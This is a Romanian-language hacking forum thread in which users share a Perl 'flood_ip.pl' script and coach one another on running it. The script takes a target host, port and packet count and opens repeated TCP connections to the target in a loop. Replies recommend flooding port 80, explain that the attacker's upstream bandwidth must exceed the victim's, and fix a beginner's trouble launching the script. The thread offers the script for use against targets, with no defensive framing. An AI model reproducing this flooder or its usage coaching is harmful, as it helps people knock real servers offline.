Jump to content
Ras

Cum sa rulezi un exploit in PERL

Recommended Posts

Posted
as vrea si eu exploitul ala pls :D flood_ip.pl dak se ofera cnva sa mil dea in pm dak nu vreti altfel plsss ca nu il am :D

#!/usr/bin/perl

use IO::Socket::INET;

print "host: "; chomp($host=<STDIN>);
print "port: "; chomp($port=<STDIN>);
print "packets: "; chomp($packets=<STDIN>);

print "Start flood target -> $host:$port\n";

$x = 0;

while ($x < $packets)
{
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port);
$x += 1;
}

if ($x eq $packets) { print "$packets packet[s] send successfully"; } else { print "There is a problem with packet`s sending"; }

close($socket);

search pe google...

EDIT

Download Perl: http://rapidshare.com/files/56619845/Perl.rar

Posted
de obicei pe ce port se da flood ... ?

si pakete cate e recomandat sa dai pana cade ...

viteza o am de 512kb ...

Majoritatea pe 80 [ http ]

WTF ? tu ai 512 KB or Kb ai 512 downstream or upstream + cand dai flood/trimiti packete folosesti upstream-ul ci nu downstreamul + tre sa ai upstreamul mai mare decat downstreamul celui pe care il ataci asta daca trimiti packetele folosind doar banda ta.

Posted
aha... problema e ca am o problema... am dat

cd\

cd perl

flood_ip.pl

cum scrie in tutorial si in loc sa imi ceara host etc....

mie imi deschide fisieru unde e scris codu unde am gresit?

poate ai dat tu alt nume la exploit... cand i-ai dat copy si paste si dupaia save ... ce nume i-ai dat?

verifica... ;)

Posted
aha... problema e ca am o problema... am dat

cd\

cd perl

flood_ip.pl

cum scrie in tutorial si in loc sa imi ceara host etc....

mie imi deschide fisieru unde e scris codu unde am gresit?

daca iti deschide fisierul inseamna ca nu ai pornit fisierul cu default shell extension.

incearca

perl flood_ip.pl

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...